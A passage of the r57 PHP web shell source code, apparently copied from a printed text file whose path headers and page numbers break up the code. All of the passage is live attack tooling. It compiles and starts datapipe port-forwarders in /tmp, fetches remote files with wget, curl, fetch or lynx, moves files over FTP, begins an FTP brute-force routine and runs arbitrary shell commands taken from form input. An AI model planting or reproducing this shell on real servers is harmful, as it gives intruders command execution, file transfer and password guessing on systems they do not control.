/tmp/dp ".$_POST[local_port]." ".$_POST[remote_host]." ".$_POST[remote_port]." 
&"); $_POST[cmd]="ps -aux | grep dp"; } if (!empty($_POST[local_port]) && !empty($_POST[remote_host]) && !empty($_POST[remote_port]) && ($_POST[use]=="C")) { cf("/tmp/dpc.c",$datapipe_c);file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  37. 37. $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); @unlink("/tmp/dpc.c"); $blah = ex("/tmp/dpc ".$_POST[local_port]." ".$_POST[remote_port]." ".$_POST[remote_host]." &"); $_POST[cmd]="ps -aux | grep dpc"; } if (!empty($_POST[alias]) && isset($aliases[$_POST[alias]])) { $_POST[cmd] = $aliases[$_POST[alias]]; } if (!empty($HTTP_POST_FILES[userfile][name])) { if(!empty($_POST[new_name])) { $nfn = $_POST[new_name]; } else { $nfn = $HTTP_POST_FILES[userfile][name]; } @copy($HTTP_POST_FILES[userfile][tmp_name], $_POST[dir]."/".$nfn) or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES[userfile][name]."</div></font>"); } if (!empty($_POST[with]) && !empty($_POST[rem_file]) && !empty($_POST[loc_file])) { switch($_POST[with]) { case wget: $_POST[cmd] = which(wget)." ".$_POST[rem_file]." -O ".$_POST[loc_file].""; break; case fetch: $_POST[cmd] = which(fetch)." -o ".$_POST[loc_file]." -p ".$_POST[rem_file].""; break; case lynx: $_POST[cmd] = which(lynx)." -source ".$_POST[rem_file]." > ".$_POST[loc_file].""; break; case links: $_POST[cmd] = which(links)." -source ".$_POST[rem_file]." > ".$_POST[loc_file].""; break; case GET: $_POST[cmd] = which(GET)." ".$_POST[rem_file]." > ".$_POST[loc_file].""; break; case curl: $_POST[cmd] = which(curl)." ".$_POST[rem_file]." -o ".$_POST[loc_file].""; break; } } if(!empty($_POST[cmd]) && ($_POST[cmd]=="ftp_file_up" || $_POST[cmd]=="ftp_file_down")) { list($ftp_server,$ftp_port) = split(":",$_POST[ftp_server_port]); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { err(3); } else { if(!@ftp_login($connection,$_POST[ftp_login],$_POST[ftp_password])) { err(4); } else { if($_POST[cmd]=="ftp_file_down") { if(chop($_POST[loc_file])==$dir) { $_POST[loc_file]=$dir.((!$unix)? 
():(/)).basename($_POST[ftp_file]); } @ftp_get($connection,$_POST[loc_file],$_POST[ftp_file],$_POST[mode]); } if($_POST[cmd]=="ftp_file_up") { @ftp_put($connection,$_POST[ftp_file],$_POST[loc_file],$_POST[mode]);file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  38. 38. } } } @ftp_close($connection); $_POST[cmd] = ""; } if(!empty($_POST[cmd]) && $_POST[cmd]=="ftp_brute") { list($ftp_server,$ftp_port) = split(":",$_POST[ftp_server_port]); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { err(3); $_POST[cmd] = ""; } else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language._text96]."</b></div></font></td></tr></table>"; $_POST[cmd] = ""; } @ftp_close($connection); } echo $table_up3; if (empty($_POST[cmd])&&!$safe_mode) { $_POST[cmd]=(!$unix)?("dir"):("ls -lia"); } else if(empty($_POST[cmd])&&$safe_mode){ $_POST[cmd]="safe_dir"; } echo $font.$lang[$language._text1].": <b>".$_POST[cmd]."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; if($safe_mode) { switch($_POST[cmd]) { case safe_dir: $d=@dir($dir); if ($d) { while (false!==($file=$d->read())) { if ($file=="." || $file=="..") continue; @clearstatcache(); list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); if(!$unix){ echo date("d.m.Y H:i",$mtime); if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); } else{ $owner = @posix_getpwuid($uid); $grgid = @posix_getgrgid($gid); echo $inode." "; echo perms(@fileperms($file)); printf("% 4d % 9s % 9s %7s ",$nlink,$owner[name],$grgid[name],$size); echo date("d.m.Y H:i ",$mtime); } echo "$filen"; } $d->close(); } else echo $lang[$language._text29]; break; case test1:file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
